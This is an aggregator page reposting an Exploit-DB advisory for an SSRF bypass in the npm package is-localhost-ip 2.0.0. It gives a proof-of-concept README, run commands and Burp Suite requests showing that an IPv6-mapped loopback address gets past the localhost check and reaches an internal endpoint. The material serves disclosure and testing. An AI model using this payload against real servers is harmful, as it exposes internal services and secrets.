惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Microsoft Azure Blog
Microsoft Azure Blog
博客园_首页
Forbes - Security
Forbes - Security
WordPress大学
WordPress大学
P
Proofpoint News Feed
T
Threat Research - Cisco Blogs
L
LINUX DO - 热门话题
L
Lohrmann on Cybersecurity
Spread Privacy
Spread Privacy
D
Darknet – Hacking Tools, Hacker News & Cyber Security
大猫的无限游戏
大猫的无限游戏
博客园 - 三生石上(FineUI控件)
P
Privacy International News Feed
A
About on SuperTechFans
T
Tailwind CSS Blog
I
InfoQ
S
Securelist
云风的 BLOG
云风的 BLOG
罗磊的独立博客
Recent Announcements
Recent Announcements
T
The Exploit Database - CXSecurity.com
B
Blog RSS Feed
V
Visual Studio Blog
Know Your Adversary
Know Your Adversary
The GitHub Blog
The GitHub Blog
Jina AI
Jina AI
腾讯CDC
Cyberwarzone
Cyberwarzone
有赞技术团队
有赞技术团队
AWS News Blog
AWS News Blog
博客园 - 【当耐特】
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
F
Full Disclosure
S
Secure Thoughts
博客园 - 司徒正美
J
Java Code Geeks
Y
Y Combinator Blog
Google Online Security Blog
Google Online Security Blog
GbyAI
GbyAI
N
News and Events Feed by Topic
Help Net Security
Help Net Security
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
Project Zero
Project Zero
T
Tenable Blog
cs.CV updates on arXiv.org
cs.CV updates on arXiv.org
T
Tor Project blog
MyScale Blog
MyScale Blog
Scott Helme
Scott Helme
小众软件
小众软件
K
Kaspersky official blog

Exploit-DB.com RSS Feed

MEmu Android Emulator 9.2.7.0 - Local Privilege Escalation OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive
OffSec’s Exploit Database Archive
nu11secur1ty · 2026-04-06 · via Exploit-DB.com RSS Feed
# Titles: is-localhost-ip 2.0.0 - SSRF 
# Author: nu11secur1ty
# Date: 11/09/2025
# Vendor: https://github.com/tinovyatkin/is-localhost-ip
# Software:
https://github.com/tinovyatkin/is-localhost-ip/releases/tag/v2.0.0
# Reference: https://portswigger.net/web-security/ssrf

## Description:

# SSRF PoC — Professional README

**WARNING: This repository contains a proof‑of‑concept (PoC) demonstrating
an SSRF / localhost canonicalization bypass.
Run only on isolated, non-production machines (local VM, sandbox). Do NOT
expose to the internet.**

## Overview

This PoC demonstrates how a naive server that blocks "localhost" by name
can be bypassed using alternate IP encodings (hex, decimal, octal,
IPv6-mapped). The included `index.js` is a **tested, minimal** Express app
that:

- Provides `/check-url?url=<URL>` which checks `is-localhost-ip(hostname)`
and fetches the URL if allowed.
- Provides `/secret` that returns a generated secret-style JSON object
(used to prove leakage).
- Includes a test harness to exercise multiple host encodings — **tests are
disabled by default** and must be explicitly enabled with
`ENABLE_SELF_TEST=1`.

## Files included

- `PoC.js` — the PoC server (safe by default: self-tests disabled unless
enabled).
- `package.json` — minimal package manifest.
- `README.md` — this file.

## Quick security summary (read before running)

- **Do not** run this on machines that have access to production networks,
secret stores, or sensitive services.
- The PoC generates synthetic API keys at `/secret`. If a test succeeds, a
generated key will be returned by `/check-url` — treat that as
proof-of-concept and not a real secret, unless you wired it to a real
system.
- Prefer running inside an isolated VM with no network access to your
corporate network; or a disposable container with blocked egress to RFC1918
and loopback.

## Requirements

- Node.js **v18+** (for built-in `fetch`).
- npm (comes with Node).

## Setup

```bash
# create directory and extract the archive or clone this repo
# inside the project directory:
npm install
```

`package.json` in this archive will install:
- `express`
- `is-localhost-ip`
- `ipaddr.js` (used by the safer checks in the index.js)

## How to run (safe default)

By default, the server will **not** run the self-tests. To start the server:

```bash
node PoC.js
```

You should see:
```
Express server running on http://localhost:3005
Self-tests disabled (set ENABLE_SELF_TEST=1 to enable)
```

Then in another terminal:

```bash
curl "http://localhost:3005/check-url?url=https://example.com"
```

Expected: fetched content preview (if allowed).

## How to run the internal tests (ONLY in an isolated environment)

If you want to run the bypass tests to reproduce the PoC **locally and
isolated**, enable them explicitly:

```bash
ENABLE_SELF_TEST=1 node PoC.js
```

The process will run a set of encoded-hostname tests against the local
`/secret` endpoint and print a summary. If any variant returns `200` and
the response includes `"apikey":`, that variant demonstrated a bypass in
your environment.

## How to disable the `/secret` endpoint (extra safety)

If you want to remove the sensitive test endpoint entirely, edit `PoC.js`
and remove or comment out the `/secret` route.

## Safe patch summary (what this PoC does to be safer)

- Resolves hostnames to IP addresses server-side using DNS and checks all
addresses against ipaddr.js ranges (rejects
loopback/private/link-local/reserved).
- Rejects non-http(s) schemes, credentials in URL, and non-allowed ports.
- Avoids following redirects when fetching upstream resources.
- Disables automatic self-tests by default (opt-in).

## Responsible disclosure template

If you plan to report this behavior to a maintainer/vendor, use the
template in the original analysis or contact the project privately with:
- Node version, OS, `is-localhost-ip` version
- Minimal PoC command and the exact payload(s) that worked
- Logs showing the returned JSON that includes the generated `apikey`

## License

This PoC is provided for testing and defensive purposes only. Use at your
own risk. No warranty.

----------------------------------------------------------------

STATUS: Medium


[+]Payload + Exploit Burp Suite:

```
# normal 403 Forbidden
GET /check-url?url=http://10.10.0.28:3005 HTTP/1.1
Host: 10.10.0.28:3005
Content-Len gth: 2
Content-Length: 2


HTTP/1.1 403 Forbidden
X-Powered-By: Express
Content-Type: application/json; charset=utf-8
Content-Length: 33
ETag: W/"21-6j4oICVQ6Z+6nx0WETDHqqeeklM"
Date: Sun, 09 Nov 2025 09:29:34 GMT
Connection: keep-alive
Keep-Alive: timeout=5

{"error":"localhost not allowed"}

-----------------------------------------------------------------

# Exploit
GET /check-url?url=http://[::ffff:7f00:1]:3005 HTTP/1.1
Host: 10.10.0.28:3005
Content-Len gth: 2
Content-Length: 2


HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: text/html; charset=utf-8
Content-Length: 306
ETag: W/"132-0QnJdvy6r/DgvnNvBs+i8eLbOLc"
Date: Sun, 09 Nov 2025 09:29:28 GMT
Connection: keep-alive
Keep-Alive: timeout=5

{"message":"Express server running","usage":"GET /check-url?url=
https://10.10.0.28:3005","examples":["GET /check-url?url=
https://httpbin.org/json","GET /check-url?url=http://localhost:8080","GET
/check-url?url=https://google.com"],"endpoints":["GET /","GET
/check-url?url=<URL>","GET /secret"],"port":3005}

```

# Reproduce:
[href](
https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2025/CVE-2025-9960
)

# Demo:
[href](https://www.patreon.com/posts/cve-2025-9960-is-143172786)

# Time spent:
03:15:00


--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
home page: https://www.asc3t1c-nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <https://www.asc3t1c-nu11secur1ty.com/>

-- 

System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstorm.news/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.asc3t1c-nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>